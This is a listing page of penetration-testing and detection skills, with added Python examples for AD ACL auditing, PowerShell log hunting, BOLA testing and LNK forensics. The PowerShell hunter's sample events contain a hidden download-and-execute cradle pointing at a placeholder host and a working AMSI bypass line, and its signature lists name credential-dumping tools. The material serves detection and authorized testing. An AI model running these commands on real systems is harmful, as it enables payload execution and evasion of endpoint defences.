Topic: penetration-testing
850 skills in this topic.
-
analyzing-active-directory-acl-abuse
Detect dangerous ACL misconfigurations in Active Directory using ldap3 to identify GenericAll, WriteDACL, and WriteOwner abuse paths
mukul975/Anthropic-Cybersecurity-Skills 4,300
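The ldap3 side of this skill is a search for nTSecurityDescriptor with the SD_FLAGS control (ldap3.protocol.microsoft.security_descriptor_control) so the DC returns the DACL; what then has to happen is parsing the returned self-relative descriptor and picking out the ACEs that matter. The following is an added example, not code from the skill repository: it parses that descriptor format (MS-DTYP SECURITY_DESCRIPTOR, ACL and ACE structures) and flags GenericAll, WriteDACL and WriteOwner granted to principals outside the built-in admin groups. The live LDAP query is omitted so the block runs offline; the domain SID, RIDs and descriptor bytes at the bottom are constructed, and the "expected principals" list is an assumption to be tuned per domain.

```python
"""Flag abusable ACEs in an Active Directory security descriptor.

Added example (not from the skill repository). The bytes parsed here are the
self-relative SECURITY_DESCRIPTOR that ldap3 returns in nTSecurityDescriptor;
the live LDAP query is omitted so the block runs offline.
"""
import struct
import uuid

# Access-mask bits (MS-DTYP 2.4.3, MS-ADTS 5.1.3.2).
WRITE_DAC = 0x00040000
WRITE_OWNER = 0x00080000
GENERIC_ALL = 0x10000000
# AD usually stores "Full Control" as the expanded object-specific rights,
# not the GENERIC_ALL bit, so both forms must be treated as GenericAll.
DS_FULL_CONTROL = 0x000F01FF

ACCESS_ALLOWED_ACE = 0x00
ACCESS_ALLOWED_OBJECT_ACE = 0x05

# Principals expected to hold takeover rights (assumption: tune per domain).
EXPECTED_SIDS = {"S-1-5-18", "S-1-5-32-544"}   # SYSTEM, BUILTIN\Administrators
EXPECTED_RIDS = {512, 518, 519}                 # Domain / Schema / Enterprise Admins


def parse_sid(buf, off):
    """Decode a binary SID at buf[off] into S-1-... form."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs)


def parse_ace(buf, off):
    """Parse one ACE; object ACEs carry optional GUIDs before the trustee SID."""
    ace_type, _flags, size = struct.unpack_from("<BBH", buf, off)
    mask, = struct.unpack_from("<I", buf, off + 4)
    pos, object_type = off + 8, None
    if ace_type == ACCESS_ALLOWED_OBJECT_ACE:
        obj_flags, = struct.unpack_from("<I", buf, pos)
        pos += 4
        if obj_flags & 0x1:                                  # ACE_OBJECT_TYPE_PRESENT
            object_type = str(uuid.UUID(bytes_le=bytes(buf[pos:pos + 16])))
            pos += 16
        if obj_flags & 0x2:                                  # ACE_INHERITED_OBJECT_TYPE_PRESENT
            pos += 16
    return {"type": ace_type, "mask": mask, "sid": parse_sid(buf, pos),
            "object_type": object_type}, off + size


def parse_dacl(sd):
    """Return the ACEs of the DACL in a self-relative security descriptor."""
    _rev, _sbz, control, _own, _grp, _sacl, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & 0x0004) or off_dacl == 0:              # SE_DACL_PRESENT
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    aces, pos = [], off_dacl + 8
    for _ in range(ace_count):
        ace, pos = parse_ace(sd, pos)
        aces.append(ace)
    return aces


def rights_of(mask):
    """Map an access mask to the abuse primitives it grants."""
    if mask & GENERIC_ALL or (mask & DS_FULL_CONTROL) == DS_FULL_CONTROL:
        return ["GenericAll"]
    return [name for bit, name in ((WRITE_DAC, "WriteDACL"), (WRITE_OWNER, "WriteOwner")) if mask & bit]


def find_abusable_aces(sd):
    """(sid, right, object_type) for dangerous rights held by unexpected principals.

    object_type is reported so the analyst can check whether an object ACE is
    scoped to a single property or control-access right rather than the object.
    """
    findings = []
    for ace in parse_dacl(sd):
        if ace["type"] not in (ACCESS_ALLOWED_ACE, ACCESS_ALLOWED_OBJECT_ACE):
            continue
        sid = ace["sid"]
        if sid in EXPECTED_SIDS or int(sid.rsplit("-", 1)[1]) in EXPECTED_RIDS:
            continue
        for right in rights_of(ace["mask"]):
            findings.append((sid, right, ace["object_type"]))
    return findings


# --- constructed sample descriptor (not real directory data) -------------------
def _sid(*subs):
    return bytes([1, len(subs)]) + (5).to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def _ace(ace_type, mask, sid):
    body = struct.pack("<I", mask) + sid
    return struct.pack("<BBH", ace_type, 0, 4 + len(body)) + body

def _sd(*aces):
    body = b"".join(aces)
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(body), len(aces), 0) + body
    # SE_SELF_RELATIVE | SE_DACL_PRESENT; owner, group and SACL omitted, DACL at offset 20
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + acl

DOMAIN = (21, 1111, 2222, 3333)   # fictitious domain SID S-1-5-21-1111-2222-3333
SAMPLE_SD = _sd(
    _ace(ACCESS_ALLOWED_ACE, DS_FULL_CONTROL, _sid(*DOMAIN, 512)),   # Domain Admins: expected
    _ace(ACCESS_ALLOWED_ACE, WRITE_DAC, _sid(*DOMAIN, 1105)),        # a regular user: abusable
    _ace(ACCESS_ALLOWED_ACE, 0x20094, _sid(*DOMAIN, 1106)),          # read-only rights: benign
)

if __name__ == "__main__":
    for sid, right, obj in find_abusable_aces(SAMPLE_SD):
        print(f"{sid} has {right}" + (f" on {obj}" if obj else ""))
```

Resolving the flagged SID back to a name (a second LDAP lookup on objectSid) and walking inherited ACEs from parent containers are the next steps; both are left out here to keep the block offline.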
-
performing-dark-web-monitoring-for-threats
Dark web monitoring involves systematically scanning Tor hidden services, underground forums, paste sites, and dark web marketplaces to identify threats targeting an organization, including leaked cre
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
hunting-for-anomalous-powershell-execution
Hunt for malicious PowerShell activity by analyzing Script Block Logging (Event 4104), Module Logging (Event 4103), and process creation events. The analyst parses Windows Event Log EVTX files to detect obfuscated commands, AMSI bypass attempts, encoded payloads, credential dumping keywords, and suspicious download cradles. Activates for requests involving PowerShell threat hunting, script block analysis, encoded command detection, or AMSI bypass identification.
mukul975/Anthropic-Cybersecurity-Skills 4,300
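The detection logic this skill describes, run over a few script blocks, as an added example that is not part of the skill repository: each 4104 event is scanned for an -EncodedCommand argument (decoded from base64 UTF-16LE, the way PowerShell itself reads it), and both the raw and decoded text are matched against AMSI bypass, download cradle, Invoke-Expression and credential-dumping signatures plus a cheap obfuscation heuristic. Events are plain dicts as a log parser would yield them; the sample events, the 192.0.2.10 host and the signature lists are constructed and are an assumption, not the skill's own rule set.

```python
"""Hunt Script Block Logging (Event ID 4104) text for encoded payloads, AMSI
bypasses, download cradles and credential-dumping tooling.

Added example (not from the skill repository). Events are plain dicts as a log
parser such as python-evtx would yield them; the samples below are constructed.
"""
import base64
import binascii
import re

# -EncodedCommand accepts any unambiguous prefix; these are the common launcher forms.
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

SIGNATURES = {
    "amsi_bypass": re.compile(r"amsiInitFailed|AmsiUtils|AmsiScanBuffer|AmsiContext", re.I),
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I),
    "invoke_expression": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "credential_dumping": re.compile(r"mimikatz|sekurlsa|lsass|DumpCreds", re.I),
}


def decode_encoded_command(text):
    """Return the UTF-16LE payload of an -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None   # e.g. a switch value that merely looks like base64


def looks_obfuscated(text):
    """Cheap heuristics for the string-building tricks obfuscators emit."""
    return (len(re.findall(r"\[char\]", text, re.I)) >= 3
            or text.count("`") >= 5
            or re.search(r"FromBase64String", text, re.I) is not None)


def analyse_script_block(text):
    """Return (sorted indicator names, decoded payload or None) for one script block."""
    decoded = decode_encoded_command(text)
    haystacks = [text] + ([decoded] if decoded else [])
    hits = set()
    if decoded:
        hits.add("encoded_command")
    for name, pattern in SIGNATURES.items():
        if any(pattern.search(h) for h in haystacks):
            hits.add(name)
    if any(looks_obfuscated(h) for h in haystacks):
        hits.add("obfuscation")
    return sorted(hits), decoded


def hunt(events):
    """Keep only 4104 events that carry at least one indicator."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        indicators, decoded = analyse_script_block(ev["ScriptBlockText"])
        if indicators:
            findings.append({"record_id": ev["RecordID"], "indicators": indicators,
                             "decoded": decoded, "script": ev["ScriptBlockText"][:80]})
    return findings


def _enc(ps):
    """Encode a payload the way an attacker's launcher would (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()

# Constructed sample events (not captured from a real host).
SAMPLE_EVENTS = [
    {"EventID": 4104, "RecordID": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Users | Sort-Object Length -Descending"},
    {"EventID": 4104, "RecordID": 2,
     "ScriptBlockText": "powershell.exe -nop -w hidden -enc "
                        + _enc("IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')")},
    {"EventID": 4104, "RecordID": 3,
     "ScriptBlockText": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                        ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"EventID": 4104, "RecordID": 4,
     "ScriptBlockText": "$a=[char]73+[char]69+[char]88;$b=[string]::Join('',$a);&$b (gc .\\s.txt)"},
    {"EventID": 4103, "RecordID": 5, "ScriptBlockText": "Invoke-Mimikatz"},   # module log, skipped here
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["record_id"], f["indicators"], f["decoded"] or f["script"])
```

Matching on the decoded payload is the part that matters: the raw 4104 text of record 2 contains nothing but a base64 blob, and only after decoding do the cradle and IEX show up. Long script blocks are logged in several 4104 fragments, so reassemble by ScriptBlockId before scanning real data.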
-
implementing-passwordless-auth-with-microsoft-entra
Implements passwordless authentication using Microsoft Entra ID with FIDO2 security keys, Windows Hello for Business, Microsoft Authenticator passkeys, and certificate-based authentication to eliminate password-based attacks. Activates for requests involving passwordless deployment, FIDO2 passkey configuration, phishing-resistant MFA, or Microsoft Entra authentication method policies.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
performing-second-order-sql-injection
Detect and exploit second-order SQL injection vulnerabilities where malicious input is stored in a database and later executed in an unsafe SQL query during a different application operation.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
detecting-service-account-abuse
Detect abuse of service accounts through anomalous interactive logons, privilege escalation, lateral movement, and unauthorized access patterns.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
testing-api-for-broken-object-level-authorization
Tests REST and GraphQL APIs for Broken Object Level Authorization (BOLA/IDOR) vulnerabilities where an authenticated user can access or modify resources belonging to other users by manipulating object identifiers in API requests. The tester intercepts API calls, identifies object ID parameters (numeric IDs, UUIDs, slugs), and systematically replaces them with IDs belonging to other users to determine if the server enforces per-object authorization. This is OWASP API Security Top 10 2023 risk API1. Activates for requests involving BOLA testing, IDOR in APIs, object-level authorization testing, or API access control bypass.
mukul975/Anthropic-Cybersecurity-Skills 4,300
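The ID-swap procedure described above, as an added example that is not part of the skill repository: the tester captures a request path, identifies the object ID segment (integer or UUID), re-points it at an object owned by a second user, then compares what the owner's session and the attacker's session receive. A 200 that returns the owner's data is a BOLA finding; 401/403/404 means per-object authorization is enforced; anything else needs manual review. `send` is any callable `(method, path, headers) -> (status, body)`, so a requests-based sender can be dropped in; here an in-process fake API with one vulnerable (v1) and one hardened (v2) endpoint stands in for the target so the block runs offline. The paths, tokens and order records are constructed.

```python
"""Probe an API for Broken Object Level Authorization by replaying one user's
session against object IDs that belong to another user.

Added example (not from the skill repository). The fake API, tokens, paths and
records below are constructed so the block runs offline.
"""
import json
import re

# Object identifiers as they appear in REST paths: integers and UUIDs (slugs need a per-API rule).
ID_PATTERN = re.compile(
    r"(?<=/)(\d+|[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})(?=/|$)", re.I)


def swap_ids(path, replacement):
    """Replace every object-ID segment of the path with `replacement`."""
    return ID_PATTERN.sub(replacement, path)


def probe_bola(send, owner_token, attacker_token, path):
    """Compare the owner's view of an object with what a second user receives.

    'vulnerable' when the attacker's session gets the owner's data back,
    'enforced' on 401/403/404, otherwise 'inconclusive'.
    """
    owner_status, owner_body = send("GET", path, {"Authorization": "Bearer " + owner_token})
    attacker_status, attacker_body = send("GET", path, {"Authorization": "Bearer " + attacker_token})
    if owner_status != 200:
        return "inconclusive"      # the baseline must succeed for the comparison to mean anything
    if attacker_status in (401, 403, 404):
        return "enforced"
    if attacker_status == 200 and attacker_body == owner_body:
        return "vulnerable"
    return "inconclusive"          # e.g. 200 with redacted fields: review by hand


# --- constructed fake API: one vulnerable and one hardened endpoint ----------------
TOKENS = {"tok-alice": "alice", "tok-bob": "bob"}
ORDERS = {"1001": {"owner": "alice", "total": 42.0},
          "1002": {"owner": "bob", "total": 17.5}}


def fake_api(method, path, headers):
    user = TOKENS.get(headers.get("Authorization", "").removeprefix("Bearer "))
    if user is None:
        return 401, ""
    m = re.fullmatch(r"/api/(v1|v2)/orders/(\d+)", path)
    if not m or method != "GET":
        return 404, ""
    version, order_id = m.groups()
    order = ORDERS.get(order_id)
    if order is None:
        return 404, ""
    # v1 trusts the ID alone (BOLA); v2 checks that the caller owns the object.
    if version == "v2" and order["owner"] != user:
        return 404, ""
    return 200, json.dumps(order)


def run_assessment(send=fake_api):
    """Alice's captured requests, re-pointed at Bob's order, for both API versions."""
    results = {}
    for captured in ("/api/v1/orders/1001", "/api/v2/orders/1001"):
        target = swap_ids(captured, "1002")
        results[target] = probe_bola(send, "tok-bob", "tok-alice", target)
    return results

if __name__ == "__main__":
    for path, verdict in run_assessment().items():
        print(f"{verdict:12} {path}")
```

The same probe should be repeated for PUT, PATCH and DELETE on each path, since write endpoints are where a missing ownership check does the most damage, and the two test accounts must have identical roles so that a difference in response can only come from the object-level check.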
-
detecting-aws-credential-exposure-with-trufflehog
Detecting exposed AWS credentials in source code repositories, CI/CD pipelines, and configuration files using TruffleHog, git-secrets, and AWS-native detection mechanisms to prevent credential theft and unauthorized account access.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
performing-kubernetes-etcd-security-assessment
Assess the security posture of Kubernetes etcd clusters by evaluating encryption at rest, TLS configuration, access controls, backup encryption, and network isolation.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
detecting-insider-threat-with-ueba
Implement User and Entity Behavior Analytics using Elasticsearch/OpenSearch to build behavioral baselines, calculate anomaly scores, perform peer group analysis, and detect insider threat indicators such as data exfiltration, privilege abuse, and unauthorized access patterns.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
performing-cloud-penetration-testing-with-pacu
Performing authorized AWS penetration testing using Pacu, the open-source AWS exploitation framework, to enumerate IAM configurations, discover privilege escalation paths, test credential harvesting, and validate security controls through systematic attack simulation.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
performing-docker-bench-security-assessment
Docker Bench for Security is an open-source script that checks dozens of common best practices around deploying Docker containers in production. Based on the CIS Docker Benchmark, it audits host confi
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
performing-firmware-extraction-with-binwalk
Performs firmware image extraction and analysis using binwalk to identify embedded filesystems, compressed archives, bootloaders, kernel images, and cryptographic material. Covers entropy analysis for detecting encrypted or compressed regions, recursive extraction of nested archives, SquashFS/CramFS/JFFS2 filesystem mounting, and string analysis for credential and configuration discovery. Activates for requests involving firmware reverse engineering, IoT device analysis, embedded system security assessment, or router/camera firmware extraction.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-ransomware-network-indicators
Identify ransomware network indicators including C2 beaconing patterns, Tor exit node connections, data exfiltration flows, and encryption key exchange via Zeek conn.log and NetFlow analysis
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
deploying-cloudflare-access-for-zero-trust
Deploying Cloudflare Access with Cloudflare Tunnel to provide zero trust access to self-hosted and private applications, configuring identity-aware access policies, device posture checks, and WARP client enrollment for VPN replacement.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-windows-lnk-files-for-artifacts
Parse Windows LNK shortcut files to extract target paths, timestamps, volume information, and machine identifiers for forensic timeline reconstruction.
mukul975/Anthropic-Cybersecurity-Skills 4,300
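A parser for the fields that summary lists, as an added example that is not part of the skill repository: it walks the MS-SHLLINK structures in order (ShellLinkHeader for the three FILETIME stamps and target size, LinkInfo for the local base path and volume serial, the count-prefixed StringData, then the ExtraData blocks for the TrackerDataBlock, which carries the NetBIOS machine name and a version-1 GUID whose node field is the MAC of the machine that created the link). The sample shortcut at the bottom is constructed with the same structures so the block runs offline; its path, machine name, serial and MAC are invented.

```python
"""Parse the forensic fields of a Windows .LNK file: header timestamps, link
target path and volume serial from LinkInfo, and the machine identifier and
MAC address from the TrackerDataBlock.

Added example (not from the skill repository); layout per MS-SHLLINK. The
sample shortcut at the bottom is constructed, not a real artifact.
"""
import struct
import uuid
from datetime import datetime, timedelta, timezone

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
HEADER = "<I16sIIQQQIIIHHII"                       # ShellLinkHeader, 76 bytes
STRING_FLAGS = {0x04: "name", 0x08: "relative_path", 0x10: "working_dir",
                0x20: "arguments", 0x40: "icon_location"}
TRACKER_SIG = 0xA0000003


def filetime(ft):
    """FILETIME (100 ns ticks since 1601) to UTC datetime; 0 means 'not set'."""
    return None if ft == 0 else EPOCH + timedelta(microseconds=ft // 10)


def cstring(data, off):
    """NUL-terminated ANSI string at data[off]."""
    return data[off:data.index(b"\0", off)].decode("latin-1")


def parse_lnk(data):
    size, clsid, flags, attrs, ctime, atime, wtime, fsize, *_ = struct.unpack_from(HEADER, data, 0)
    if size != 0x4C or uuid.UUID(bytes_le=clsid) != LNK_CLSID:
        raise ValueError("not a shell link")
    info = {"created": filetime(ctime), "accessed": filetime(atime), "modified": filetime(wtime),
            "target_size": fsize, "attributes": attrs}
    pos = 0x4C
    if flags & 0x01:                                 # HasLinkTargetIDList: skip the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & 0x02:                                 # HasLinkInfo
        li_size, _hdr, li_flags, vol_off, base_off, _net, _suffix = struct.unpack_from("<7I", data, pos)
        if li_flags & 0x01:                          # VolumeIDAndLocalBasePath
            v = pos + vol_off
            _vsize, drive_type, serial, label_off = struct.unpack_from("<4I", data, v)
            info.update(drive_type=drive_type, volume_serial="%08X" % serial,
                        volume_label=cstring(data, v + label_off),
                        local_base_path=cstring(data, pos + base_off))
        pos += li_size
    unicode = bool(flags & 0x80)                     # IsUnicode
    for bit, key in STRING_FLAGS.items():           # StringData: char count, then chars, no terminator
        if flags & bit:
            n = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            nbytes = n * 2 if unicode else n
            info[key] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "latin-1")
            pos += nbytes
    while pos + 8 <= len(data):                      # ExtraData blocks end with a size < 4
        bsize, sig = struct.unpack_from("<II", data, pos)
        if bsize < 4:
            break
        if sig == TRACKER_SIG:
            info["machine_id"] = data[pos + 16:pos + 32].split(b"\0", 1)[0].decode("ascii", "replace")
            file_droid = uuid.UUID(bytes_le=bytes(data[pos + 48:pos + 64]))
            if file_droid.version == 1:              # v1 GUID: the node field is the NIC MAC
                info["mac_address"] = ":".join("%02x" % b for b in file_droid.node.to_bytes(6, "big"))
        pos += bsize
    return info


# --- constructed sample shortcut (not a real artifact) -------------------------------
def build_sample_lnk():
    ts = lambda dt: (dt - EPOCH) // timedelta(microseconds=1) * 10
    created = datetime(2024, 3, 15, 9, 30, tzinfo=timezone.utc)
    header = struct.pack(HEADER, 0x4C, LNK_CLSID.bytes_le, 0x01 | 0x02 | 0x04 | 0x80, 0x20,
                         ts(created), ts(created), ts(created + timedelta(days=2)), 4096, 0, 1, 0, 0, 0, 0)
    idlist = struct.pack("<HH", 2, 0)               # empty IDList: size 2, then TerminalID
    path, label = b"C:\\Users\\alice\\Desktop\\invoice.exe\0", b"OS\0"
    volume = struct.pack("<4I", 16 + len(label), 3, 0x1234ABCD, 16) + label   # DRIVE_FIXED
    hdr = 28                                         # LinkInfoHeaderSize without unicode offsets
    body = volume + path + b"\0"
    linkinfo = struct.pack("<7I", hdr + len(body), hdr, 1, hdr, hdr + len(volume), 0,
                           hdr + len(volume) + len(path)) + body
    name = struct.pack("<H", 7) + "Invoice".encode("utf-16-le")
    vol_droid = uuid.UUID(int=0).bytes_le
    file_droid = uuid.UUID(fields=(0x1A2B3C4D, 0x5E6F, 0x11EE, 0x80, 0x01, 0x005056AABBCC)).bytes_le
    tracker = (struct.pack("<IIII", 0x60, TRACKER_SIG, 0x58, 0) + b"DESKTOP-A1B2C3".ljust(16, b"\0")
               + vol_droid + file_droid + vol_droid + file_droid)
    return header + idlist + linkinfo + name + tracker + struct.pack("<I", 0)

if __name__ == "__main__":
    for k, v in parse_lnk(build_sample_lnk()).items():
        print(f"{k:16} {v}")
```

The header timestamps describe the target at the time the shortcut was created or updated, not the shortcut file itself, so pair them with the .LNK's own filesystem MACB times when building the timeline; the machine identifier and MAC are what let you tie a shortcut back to the host it was created on after it has been copied elsewhere.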
-
detecting-qr-code-phishing-with-email-security
Detect and prevent QR code phishing (quishing) attacks that bypass traditional email security by embedding malicious URLs in QR code images within emails.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
detecting-process-injection-techniques
Detects and analyzes process injection techniques used by malware including classic DLL injection, process hollowing, APC injection, thread hijacking, and reflective loading. Uses memory forensics, API monitoring, and behavioral analysis to identify injection artifacts. Activates for requests involving process injection detection, code injection analysis, hollowed process investigation, or in-memory threat detection.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
implementing-container-image-minimal-base-with-distroless
Reduce container attack surface by building application images on Google distroless base images that contain only the application runtime with no shell, package manager, or unnecessary OS utilities.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
analyzing-linux-elf-malware
Analyzes malicious Linux ELF (Executable and Linkable Format) binaries including botnets, cryptominers, ransomware, and rootkits targeting Linux servers, containers, and cloud infrastructure. Covers static analysis, dynamic tracing, and reverse engineering of x86_64 and ARM ELF samples. Activates for requests involving Linux malware analysis, ELF binary investigation, Linux server compromise assessment, or container malware analysis.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
detecting-cryptomining-in-cloud
This skill teaches security teams how to detect and respond to unauthorized cryptocurrency mining operations in cloud environments. It covers identifying cryptomining indicators through compute usage anomalies, network traffic patterns to mining pools, GuardDuty CryptoCurrency findings, and runtime process monitoring on EC2, ECS, EKS, and Azure Automation workloads.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
extracting-windows-event-logs-artifacts
Extract, parse, and analyze Windows Event Logs (EVTX) using Chainsaw, Hayabusa, and EvtxECmd to detect lateral movement, persistence, and privilege escalation.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
detecting-suspicious-oauth-application-consent
Detect risky OAuth application consent grants in Azure AD / Microsoft Entra ID using Microsoft Graph API, audit logs, and permission analysis to identify illicit consent grant attacks.
mukul975/Anthropic-Cybersecurity-Skills 4,300
-
hunting-for-unusual-service-installations
Detect suspicious Windows service installations (MITRE ATT&CK T1543.003) by parsing System event logs for Event ID 7045, analyzing service binary paths, and identifying indicators of persistence mechanisms.
mukul975/Anthropic-Cybersecurity-Skills 4,300